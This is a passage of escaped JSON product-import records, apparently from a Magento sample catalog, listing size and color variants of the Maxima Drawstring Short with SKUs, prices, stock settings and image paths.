Cotton|Spandex,pattern=Solid,climate=Indoor|Hot|Mild|Warm,eco_collection=Yes,performance_fabric=No,erin_recommends=No,new=Yes,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=WSH01-28-Black,size=28,color=Black|sku=WSH01-28-Green,size=28,color=Green|sku=WSH01-28-Red,size=28,color=Red|sku=WSH01-29-Black,size=29,color=Black|sku=WSH01-29-Green,size=29,color=Green|sku=WSH01-29-Red,size=29,color=Red|sku=WSH01-30-Black,size=30,color=Black|sku=WSH01-30-Green,size=30,color=Green|sku=WSH01-30-Red,size=30,color=Red|sku=WSH01-31-Black,size=31,color=Black|sku=WSH01-31-Green,size=31,color=Green|sku=WSH01-31-Red,size=31,color=Red|sku=WSH01-32-Black,size=32,color=Black|sku=WSH01-32-Green,size=32,color=Green|sku=WSH01-32-Red,size=32,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"image\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh01-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh01-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_bottom\":\"Basic|Base Layer\",\"material\":\"Organic Cotton|Spandex\",\"pattern\":\"Solid\",\"climate\":\"Indoor|Hot|Mild|Warm\",\"eco_collection\":\"Yes\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"Yes\",\"sale\":\"No\"},\"1873\":{\"sku\":\"WSH02-28-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Maxima Drawstring Short-28-Gray\",\"description\":\"<p>Even laid-back women like to stay stylish, and that\'s just what the Maxima Drawstring Short delivers. An elastic waist keeps the fit flexible, on the deck at home or on a trail walk. Sporty tennis flair adds an athletic accent.<\\/p>\\n<p>&bull; Light gray run shorts <br \\/>- cotton polyester. <br \\/>&bull; Contrast binding. <br \\/>&bull; 3\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maxima-drawstring-short-28-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh02-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Gray\"},\"1874\":{\"sku\":\"WSH02-28-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Maxima Drawstring Short-28-Orange\",\"description\":\"<p>Even laid-back women like to stay stylish, and that\'s just what the Maxima Drawstring Short delivers. An elastic waist keeps the fit flexible, on the deck at home or on a trail walk. Sporty tennis flair adds an athletic accent.<\\/p>\\n<p>&bull; Light gray run shorts <br \\/>- cotton polyester. <br \\/>&bull; Contrast binding. <br \\/>&bull; 3\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maxima-drawstring-short-28-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Orange\"},\"1875\":{\"sku\":\"WSH02-28-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Maxima Drawstring Short-28-Yellow\",\"description\":\"<p>Even laid-back women like to stay stylish, and that\'s just what the Maxima Drawstring Short delivers. An elastic waist keeps the fit flexible, on the deck at home or on a trail walk. Sporty tennis flair adds an athletic accent.<\\/p>\\n<p>&bull; Light gray run shorts <br \\/>- cotton polyester. <br \\/>&bull; Contrast binding. <br \\/>&bull; 3\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maxima-drawstring-short-28-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Yellow\"},\"1876\":{\"sku\":\"WSH02-29-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Maxima Drawstring Short-29-Gray\",\"description\":\"<p>Even laid-back women like to stay stylish, and that\'s just what the Maxima Drawstring Short delivers. An elastic waist keeps the fit flexible, on the deck at home or on a trail walk. Sporty tennis flair adds an athletic accent.<\\/p>\\n<p>&bull; Light gray run shorts <br \\/>- cotton polyester. <br \\/>&bull; Contrast binding. <br \\/>&bull; 3\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maxima-drawstring-short-29-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh02-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Gray\"},\"1877\":{\"sku\":\"WSH02-29-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Maxima Drawstring Short-29-Orange\",\"description\":\"<p>Even laid-back women like to stay stylish, and that\'s just what the Maxima Drawstring Short delivers. An elastic waist keeps the fit flexible, on the deck at home or on a trail walk. Sporty tennis flair adds an athletic accent.<\\/p>\\n<p>&bull; Light gray run shorts <br \\/>- cotton polyester. <br \\/>&bull; Contrast binding. <br \\/>&bull; 3\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maxima-drawstring-short-29-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Orange\"},\"1878\":{\"sku\":\"WSH02-29-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Maxima Drawstring Short-29-Yellow\",\"description\":\"<p>Even laid-back women like to stay stylish, and that\'s just what the Maxima Drawstring Short delivers. An elastic waist keeps the fit flexible, on the deck at home or on a trail walk. Sporty tennis flair adds an athletic accent.<\\/p>\\n<p>&bull; Light gray run shorts <br \\/>- cotton polyester. <br \\/>&bull; Contrast binding. <br \\/>&bull; 3\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maxima-drawstring-short-29-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh02-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh02-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh02-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh02-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh02-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Yellow\"},\"1879\":{\"sku\":\"WSH02-30-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Maxima Drawstring Short-30-Gray\",\"description\":\"<p>Even laid-back women like to stay stylish, and that\'s just what the Maxima Drawstring Short delivers. An elastic waist keeps the fit flexible, on the deck at home or on a trail walk. Sporty tennis flair adds an athletic accent.<\\/p>\\n<p>&bull; Light gray run shorts <br \\/>- cotton polyester. <br \\/>&bull; Contrast binding. <br \\/>&bull; 3\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maxima-drawstring-short-30-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh02-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh02-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Gray\"},\"1880\":{\"sku\":\"WSH02-30-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Promotions\\/Women Sale,Default Category\",\"product_websites\":\"base\",\"name\":\"Maxima Drawstring Short-30-Orange\",\"description\":\"<p>Even laid-back women like to stay stylish, and that\'s just what the Maxima Drawstring Short delivers. An elastic waist keeps the fit flexible, on the deck at home or on a trail walk. Sporty tennis flair adds an athletic accent.<\\/p>\\n<p>&bull; Light gray run shorts <br \\/>- cotton polyester. <br \\/>&bull; Contrast binding. <br \\/>&bull; 3\\\" inseam. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"28\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"maxima-drawstring-short-30-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"ha